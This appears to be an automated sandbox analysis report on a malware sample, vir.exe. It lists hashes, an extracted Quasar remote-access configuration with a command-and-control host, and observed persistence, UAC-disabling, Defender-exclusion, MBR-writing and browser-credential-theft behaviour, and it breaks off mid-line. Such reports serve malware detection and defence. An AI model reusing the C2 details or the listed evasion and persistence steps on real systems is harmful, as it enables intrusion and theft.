Resubmissions
26-12-2024 15:01
241226-sec6vayjgx 1027-09-2024 10:28
240927-mh3m1sxgrm 1018-08-2024 19:49
240818-yjmtqsthkm 1018-08-2024 14:30
240818-rvdxmsxgjg 1015-08-2024 23:29
240815-3g3jmawdnq 1015-08-2024 23:15
240815-28syts1brg 1015-08-2024 22:57
240815-2w8thszepa 10Analysis
-
max time kernel
330s -
max time network
339s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
15-08-2024 22:44
Behavioral task
behavioral1
Sample
vir.exe
Resource
win11-20240802-en
General
-
Target
vir.exe
-
Size
336.1MB
-
MD5
bc82ea785da1180a8a964b3e54ad106c
-
SHA1
4c1952ce778455af8ed10dca7b9f77d7815e8d0a
-
SHA256
c283ed662a29c18b117ba63ac41cca356934c6a29a1eb66e30d8305637e3411b
-
SHA512
62bf34d75e913a47185664a34555678d0b8c2cf03c9e922b0bdcb085713322bafba2bf396b43a4cda7e0be6d315aea027bba29c628fe561d01e3026b4e0b405b
-
SSDEEP
6291456:72qVJw+odBeWFv1k4R4b0ewZkhT4ofHwJjvZDQPf2tLSkHZdHVeVF0oJ:yr+WeSWgfecGT4RjvqP85/A33
Malware Config
Extracted
quasar
1.4.1
romka
jozzu420-51305.portmap.host:51305
0445c342-b551-411c-9b80-cd437437f491
-
encryption_key
E1BF1D99459F04CAF668F054744BC2C514B0A3D6
-
install_name
Romilyaa.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows 10 Boot
-
subdirectory
SubDir
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/files/0x000100000002ab3d-216.dat family_umbral -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Program Files (x86)\\rover\\rover.exe" Rover.exe -
Quasar payload 2 IoCs
resource yara_rule behavioral1/files/0x000100000002ab39-212.dat family_quasar behavioral1/memory/6576-3452-0x0000000000E90000-0x00000000011B4000-memory.dmp family_quasar -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Rover.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\vir_24f1c8ec-2607-4230-9cfb-c7baba4af4c5\the.exe = "0" powershell.exe -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 50 6048 mshta.exe 91 2376 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 1900 powershell.exe 1000 powershell.exe 6056 powershell.exe 4056 powershell.EXE 5820 powershell.exe 6704 powershell.exe 6924 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 6 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\drivers\afunix.sys Rover.exe File opened for modification C:\Windows\System32\drivers\SETE313.tmp DrvInst.exe File created C:\Windows\System32\drivers\SETE313.tmp DrvInst.exe File opened for modification C:\Windows\System32\drivers\droidcam.sys DrvInst.exe File opened for modification C:\Windows\System32\drivers\drmk.sys DrvInst.exe File opened for modification C:\Windows\System32\drivers\portcls.sys DrvInst.exe -
Manipulates Digital Signatures 1 TTPs 3 IoCs
Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates\A4BBD3A723C0E460F69F875DFFD3F7D81462842D\Blob = 0f00000001000000140000007cc65f74e732fe4765d7cef1036a1d76c0afda61030000000100000014000000a4bbd3a723c0e460f69f875dffd3f7d81462842d200000000100000000030000308202fc308201e4a00302010202102421a3eafcd2e7824625facaee7c618d300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234303831353232343633395a180f32313234303732323232343633395a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100ba1a111cdd250b1bbd786c653bc81860286ff773d34a1d5971de2a2f0710f46a48d18f06629a0d71549297b946ef44b3243884577228c6ecb84705a923517b0e43b3d1700f1f106f2351129665c16fda84dfd57fea38e36ab6bdad2f732da283295d0f2fd2f5967becb70c00d5c755e6824b713e48d5e2a8526e999de190ff4129e78b32af0f14b5c47fbe55fd2e23a17978fab322208cf5726f69c39e5fb7675c8857906e04379154063e889bbef90c90b1e29a3a35641fc53ab201ff638df8f5695e919ba12ea61626837b1ce1731ce92e90792cdbc0761fe7b9402626a6409b7bada339028aae407a094dbecd425f5bae62d9cd1826b8bb38fc8a8a6be8c50203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e4041534141505244420030090603551d1304023000300d06092a864886f70d010105050003820101004fd02e724bf01aaf758fc326ca485985fb20b6e7c205bb239c36a9f124906dc77da184c5bfde019ed0acd3542b8ef2580e235e49208bbac199708a25199576f1ffb2e0b0d097d78d3bf5906fe551e3e5778eef5e4116b76c33149c82417033e5f843389cceb5407c3e22653395b03cc998de7dc1b611f6803cf28fa1df540f2f1c1787a2b1800535a165066ef01b381aacaafa45526a670eff9c241ac37424da5f67c6af53eef5353ec2698043a4431a2470abc25ba72fdcb45502859c8f8a418c223a811ea8e536adf058bdec625760266e5647257e1c30552bb995a830a45d4eb0028210e36124d61636f4e86843c340b618bd50557a54da676c90838f5b4c msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates\A4BBD3A723C0E460F69F875DFFD3F7D81462842D\Blob = 0f00000001000000140000007cc65f74e732fe4765d7cef1036a1d76c0afda610200000001000000cc0000001c0000006c0000000100000000000000000000000000000001000000310033003900330033003600310062002d0038003800630038002d0034003400310063002d0039003100320033002d0030003600350039003900650036006100390034003800300000000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000a4bbd3a723c0e460f69f875dffd3f7d81462842d200000000100000000030000308202fc308201e4a00302010202102421a3eafcd2e7824625facaee7c618d300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234303831353232343633395a180f32313234303732323232343633395a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100ba1a111cdd250b1bbd786c653bc81860286ff773d34a1d5971de2a2f0710f46a48d18f06629a0d71549297b946ef44b3243884577228c6ecb84705a923517b0e43b3d1700f1f106f2351129665c16fda84dfd57fea38e36ab6bdad2f732da283295d0f2fd2f5967becb70c00d5c755e6824b713e48d5e2a8526e999de190ff4129e78b32af0f14b5c47fbe55fd2e23a17978fab322208cf5726f69c39e5fb7675c8857906e04379154063e889bbef90c90b1e29a3a35641fc53ab201ff638df8f5695e919ba12ea61626837b1ce1731ce92e90792cdbc0761fe7b9402626a6409b7bada339028aae407a094dbecd425f5bae62d9cd1826b8bb38fc8a8a6be8c50203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e4041534141505244420030090603551d1304023000300d06092a864886f70d010105050003820101004fd02e724bf01aaf758fc326ca485985fb20b6e7c205bb239c36a9f124906dc77da184c5bfde019ed0acd3542b8ef2580e235e49208bbac199708a25199576f1ffb2e0b0d097d78d3bf5906fe551e3e5778eef5e4116b76c33149c82417033e5f843389cceb5407c3e22653395b03cc998de7dc1b611f6803cf28fa1df540f2f1c1787a2b1800535a165066ef01b381aacaafa45526a670eff9c241ac37424da5f67c6af53eef5353ec2698043a4431a2470abc25ba72fdcb45502859c8f8a418c223a811ea8e536adf058bdec625760266e5647257e1c30552bb995a830a45d4eb0028210e36124d61636f4e86843c340b618bd50557a54da676c90838f5b4c msedge.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pwrshsip.dll Rover.exe -
Possible privilege escalation attempt 4 IoCs
pid Process 2572 takeown.exe 720 icacls.exe 6600 takeown.exe 6824 icacls.exe -
.NET Reactor proctector 35 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/memory/4036-250-0x0000000006010000-0x0000000006560000-memory.dmp net_reactor behavioral1/memory/4036-253-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-251-0x0000000006B10000-0x000000000705E000-memory.dmp net_reactor behavioral1/memory/4036-252-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-255-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-259-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-261-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-266-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-268-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-274-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-277-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-283-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-286-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-293-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-303-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-301-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-291-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-289-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-281-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-287-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-272-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-270-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-279-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-263-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-257-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-318-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-316-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-326-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-329-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-331-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-332-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-314-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-309-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-307-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor behavioral1/memory/4036-305-0x0000000006B10000-0x0000000007059000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\International\Geo\Nation qbNQbLf.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1fMSN8H88SIYSoMimpJoWyLL.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IYn1UbkF2Z0whRfmgR8bX7td.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iGBSQHxSr29rKL5eAHAdeMk1.bat msbuild.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 50 IoCs
pid Process 3096 ProgressBarSplash.exe 4036 Rover.exe 3616 Google.exe 5816 regmess.exe 5348 1.exe 396 3.exe 5536 WinaeroTweaker-1.40.0.0-setup.exe 472 WinaeroTweaker-1.40.0.0-setup.tmp 6576 scary.exe 6584 the.exe 6680 wimloader.dll 6864 Romilyaa.exe 3532 Romilyaa.exe 6832 Romilyaa.exe 5784 ac3.exe 6256 fyKBjrO0HsSpn0s1aErlpNHR.exe 6968 Install.exe 2724 Install.exe 6756 ifapiSTM20eylY5gWCyZkyBA.exe 6956 Romilyaa.exe 432 Romilyaa.exe 4896 Romilyaa.exe 4968 packer.exe 6180 Romilyaa.exe 1356 vc_redist.x86.exe 7040 vc_redist.x86.exe 5224 insdrv.exe 5716 Romilyaa.exe 3644 insdrv.exe 5264 Romilyaa.exe 7028 Romilyaa.exe 7080 Romilyaa.exe 1368 Install.exe 4296 Romilyaa.exe 6104 Romilyaa.exe 6036 qbNQbLf.exe 472 Romilyaa.exe 7136 Romilyaa.exe 1384 Romilyaa.exe 2772 Romilyaa.exe 4408 Romilyaa.exe 6560 Romilyaa.exe 5396 Romilyaa.exe 7124 Romilyaa.exe 3204 Romilyaa.exe 5648 Romilyaa.exe 5520 Romilyaa.exe 1096 Romilyaa.exe 4860 Romilyaa.exe 3088 Romilyaa.exe -
Indirect Command Execution 1 TTPs 17 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 5776 forfiles.exe 5316 forfiles.exe 4572 forfiles.exe 668 forfiles.exe 3768 forfiles.exe 3976 forfiles.exe 3036 forfiles.exe 864 forfiles.exe 4892 forfiles.exe 6168 forfiles.exe 3088 forfiles.exe 6952 forfiles.exe 6364 forfiles.exe 6356 forfiles.exe 3740 forfiles.exe 6936 forfiles.exe 5236 forfiles.exe -
Loads dropped DLL 11 IoCs
pid Process 5348 1.exe 5348 1.exe 5348 1.exe 472 WinaeroTweaker-1.40.0.0-setup.tmp 5348 1.exe 5348 1.exe 7040 vc_redist.x86.exe 5176 regsvr32.exe 5244 regsvr32.exe 752 regsvr32.exe 2376 rundll32.exe -
Modifies file permissions 1 TTPs 4 IoCs
pid Process 2572 takeown.exe 720 icacls.exe 6600 takeown.exe 6824 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x000100000002ab4a-228.dat upx behavioral1/files/0x000100000002ab2a-196.dat upx behavioral1/memory/396-3336-0x0000000000D80000-0x00000000023A7000-memory.dmp upx behavioral1/memory/396-3442-0x0000000000D80000-0x00000000023A7000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Rover.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Rover.exe -
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json qbNQbLf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json qbNQbLf.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini Install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 58 pastebin.com 56 pastebin.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 Rover.exe -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000100000002ab29-121.dat autoit_exe behavioral1/files/0x000100000002ab2e-201.dat autoit_exe behavioral1/files/0x000100000002ab23-191.dat autoit_exe -
Drops file in System32 directory 64 IoCs
description ioc Process File opened for modification C:\Windows\System32\DriverStore\FileRepository\flpydisk.inf_amd64_ef4e0305d74ad8fb\flpydisk.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\stornvme.inf_amd64_1202ef42a1a9dd8c\stornvme.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\usbcciddriver.inf_amd64_f810dcaa69379cbf\UsbccidDriver.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\msgpiowin32.inf_amd64_28cdcf856bfd9875\msgpiowin32.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\netvg63a.inf_amd64_9f5493180b1252cf\getn63a.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\netwtw04.inf_amd64_c8f5ae6576289a2d\Netwtw04.sys Rover.exe File opened for modification C:\Windows\SysWOW64\IME\IMEJP\imjputyc.dll Rover.exe File opened for modification C:\Windows\SysWOW64\InstallShield\setupdir\0007\_setup.dll Rover.exe File opened for modification C:\Windows\SysWOW64\Dism\GenericProvider.dll Rover.exe File opened for modification C:\Windows\SysWOW64\Dism\ProvProvider.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\mdmbtmdm.inf_amd64_a1f5e548bf3de8e9\bthmodem.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\sti.inf_amd64_3f5e62a7baeba7dc\scsiscan.sys Rover.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\en\Microsoft.AppV.AppVClientPowerShell.resources.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\droidcamvideo.inf_amd64_47e18363cbf3dfe0\droidcamvideo.inf DrvInst.exe File opened for modification C:\Windows\SysWOW64\downlevel\api-ms-win-core-processthreads-l1-1-0.dll Rover.exe File opened for modification C:\Windows\SysWOW64\downlevel\API-MS-Win-core-string-obsolete-l1-1-0.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\ialpssi_gpio.inf_amd64_62ffa3c95446bcfc\iaLPSSi_GPIO.sys Rover.exe File opened for modification C:\Windows\SysWOW64\Dism\VhdProvider.dll Rover.exe File opened for modification C:\Windows\SysWOW64\downlevel\api-ms-win-core-registry-l2-1-0.dll Rover.exe File opened for modification C:\Windows\SysWOW64\downlevel\API-MS-Win-Eventing-Legacy-L1-1-0.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\wsdscdrv.inf_amd64_24f24fc38e3e582d\WSDScDrv.dll Rover.exe File opened for modification C:\Windows\SysWOW64\InstallShield\setupdir\001e\_setup.dll Rover.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 qbNQbLf.exe File opened for modification C:\Windows\SysWOW64\Dism\DismCorePS.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\spaceport.inf_amd64_963e5f90c3cb96e2\spacedump.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{603550e4-17ad-3a4b-9263-57632575ff42}\SETDE51.tmp DrvInst.exe File opened for modification C:\Windows\SysWOW64\downlevel\api-ms-win-core-io-l1-1-0.dll Rover.exe File opened for modification C:\Windows\SysWOW64\IME\IMETC\applets\IMTCDIC.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\xboxgip.inf_amd64_3e25c04e2c3d6613\devauthe.sys Rover.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll Rover.exe File opened for modification C:\Windows\SysWOW64\downlevel\api-ms-win-base-util-l1-1-0.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\netwtw06.inf_amd64_2edd50e7a54d503b\IntelWifiIhv06.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\windowstrustedrtproxy.inf_amd64_55ba88f64499dac1\WindowsTrustedRTProxy.sys Rover.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA qbNQbLf.exe File opened for modification C:\Windows\SysWOW64\migration\shmig.dll Rover.exe File created C:\Windows\System32\DriverStore\Temp\{603550e4-17ad-3a4b-9263-57632575ff42}\SETDE51.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\input.inf_amd64_702fdf2336d2162d\hidparse.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\rdcameradriver.inf_amd64_a7342c1d3e05adb5\RDCameraDriver.dll Rover.exe File opened for modification C:\Windows\SysWOW64\InstallShield\setupdir\040c\_setup.dll Rover.exe File opened for modification C:\Windows\SysWOW64\downlevel\api-ms-win-service-management-l2-1-0.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\ntprint4.inf_amd64_acefa68322641a2c\Amd64\MSxpsPS.dll Rover.exe File opened for modification C:\Windows\SysWOW64\downlevel\api-ms-win-core-timezone-l1-1-0.dll Rover.exe File opened for modification C:\Windows\SysWOW64\F12\F12AppFrame.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\mchgr.inf_amd64_ec6b084dd265a1b9\breecemc.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\microsoft_bluetooth_avrcptransport.inf_amd64_0ef65cfbe809c478\Microsoft.Bluetooth.AvrcpTransport.sys Rover.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Provisioning\provpackageapi.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{6642010e-e9c5-a149-919a-d5c3296e156c} DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\amdsata.inf_amd64_ea60132f1a9a7a62\amdxata.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\droidcam.inf_amd64_c14a386568f95d09\droidcam.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\droidcam.inf_amd64_c14a386568f95d09\droidcam.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\intelpep.inf_amd64_bd64144a4b3fd894\intelpep.sys Rover.exe File opened for modification C:\Windows\SysWOW64\setup\msdtcstp.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\1394.inf_amd64_1321f5d3cb2d9ef4\1394ohci.sys Rover.exe File opened for modification C:\Windows\SysWOW64\wbem\WMIADAP.exe Rover.exe File opened for modification C:\Windows\SysWOW64\oobe\SetupCleanupTask.dll Rover.exe File opened for modification C:\Windows\SysWOW64\wbem\wbemsvc.dll Rover.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\netl260a.inf_amd64_783312763f8749c7\l260x64.sys Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\xinputhid.inf_amd64_6c32bb61e34a79ed\xinputhid.sys Rover.exe File opened for modification C:\Windows\SysWOW64\F12\Timeline_is.dll Rover.exe File opened for modification C:\Windows\SysWOW64\migration\hwvidmigplugin.dll Rover.exe File opened for modification C:\Windows\SysWOW64\downlevel\api-ms-win-core-debug-l1-1-0.dll Rover.exe File opened for modification C:\Windows\SysWOW64\downlevel\api-ms-win-crt-convert-l1-1-0.dll Rover.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\sensorsalsdriver.inf_amd64_9969a93554339919\acpials.sys Rover.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 2620 tasklist.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\%username%\\Desktop\\t\\a\\bg.png" reg.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 5744 set thread context of 6128 5744 powershell.exe 200 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\rover\_4Idle\_4Idle.002.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_4Idle\_4Idle.005.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_7Idle\_7Idle.007.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_7Idle\_7Idle.017.png Rover.exe File created C:\Program Files (x86)\rover\Ashamed\Ashamed.014.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Eat\Eat.010.png Rover.exe File created C:\Program Files (x86)\rover\_4Idle\_4Idle.008.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Lick\Lick.004.png Rover.exe File created C:\Program Files (x86)\rover\Sleep\Sleep.008.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Eat\Eat.016.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Tired\Tired.011.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Start_Speak\Start_Speak.003.png Rover.exe File created C:\Program Files (x86)\rover\Eat\Eat.002.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Eat\Eat.034.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Eat\Eat.052.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_3Idle\_3Idle.001.png Rover.exe File created C:\Program Files (x86)\rover\Tired\Tired.002.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Eat\Eat.011.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_8Idle\_8Idle.003.png Rover.exe File created C:\Program Files (x86)\rover\Come\Come.014.png Rover.exe File created C:\Program Files (x86)\rover\Eat\Eat.014.png Rover.exe File created C:\Program Files (x86)\rover\Exit\Exit.017.png Rover.exe File created C:\Program Files (x86)\rover\_10Idle\_10Idle.007.png Rover.exe File created C:\Program Files (x86)\rover\Come\Come.012.png Rover.exe File created C:\Program Files (x86)\rover\_9Idle\_9Idle.003.png Rover.exe File created C:\Program Files (x86)\rover\_10Idle\_10Idle.020.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Reading\Reading.013.png Rover.exe File created C:\Program Files (x86)\rover\_9Idle\_9Idle.010.png Rover.exe File created C:\Program Files (x86)\rover\Speak\Speak.013.png Rover.exe File created C:\Program Files (x86)\rover\RU_welcome.txt Rover.exe File created C:\Program Files (x86)\DroidCam\vc_redist.x86.exe 1.exe File created C:\Program Files (x86)\DroidCam\loading.gif 1.exe File opened for modification C:\Program Files (x86)\rover\_5Idle\_5Idle.003.png Rover.exe File created C:\Program Files (x86)\rover\Lick\Lick.019.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Eat\Eat.072.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_8Idle\_8Idle.001.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_9Idle\_9Idle.010.png Rover.exe File created C:\Program Files (x86)\rover\Lick\Lick.014.png Rover.exe File created C:\Program Files (x86)\rover\_9Idle\_9Idle.034.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Come\Come.015.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Eat\Eat.065.png Rover.exe File created C:\Program Files (x86)\rover\Exit\Exit.012.png Rover.exe File created C:\Program Files (x86)\rover\Exit\Exit.028.png Rover.exe File created C:\Program Files (x86)\rover\_9Idle\_9Idle.011.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_5Idle\_5Idle.015.png Rover.exe File opened for modification C:\Program Files (x86)\rover\RU_kill.txt Rover.exe File opened for modification C:\Program Files (x86)\rover\Eat\Eat.027.png Rover.exe File created C:\Program Files (x86)\rover\Exit\Exit.007.png Rover.exe File created C:\Program Files (x86)\rover\_2Idle\_2Idle.010.png Rover.exe File created C:\Program Files (x86)\rover\_2Idle\_2Idle.014.png Rover.exe File created C:\Program Files (x86)\rover\_3Idle\_3Idle.009.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Reading\Reading.005.png Rover.exe File created C:\Program Files (x86)\rover\_4Idle\_4Idle.006.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_5Idle\_5Idle.004.png Rover.exe File created C:\Program Files (x86)\rover\_5Idle\_5Idle.005.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_7Idle\_7Idle.003.png Rover.exe File opened for modification C:\Program Files 